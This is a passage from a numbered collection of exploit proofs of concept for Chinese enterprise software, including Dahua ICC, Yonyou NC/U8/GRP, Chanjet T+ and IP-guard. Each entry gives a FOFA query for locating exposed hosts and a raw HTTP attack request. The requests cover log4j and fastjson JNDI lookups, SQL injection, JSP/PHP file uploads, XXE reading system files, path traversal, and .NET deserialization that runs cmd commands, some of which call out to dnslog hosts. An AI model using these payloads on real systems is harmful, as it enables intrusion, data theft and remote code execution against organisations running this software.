The body is the usual fastjson probe: a java.net.URL object nested inside a JSONObject forces a DNS lookup of the DNSLog host, which confirms that fastjson autotype is reachable. The JSON is deliberately malformed; send it as shown.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}

22. 大华 (Dahua) ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. 大华 (Dahua) ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
Same endpoint and payload shape as entry 21; only the DNSLog host differs.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. 用友 (Yonyou) NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
The fname field sets the server-side destination, so the uploaded .txt is written as a .jsp under nc_web.
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Uploaded file path:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
Version: <=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
Version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
Version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Uploaded file path:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Uploaded file path:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Social Business ERP validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa


62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

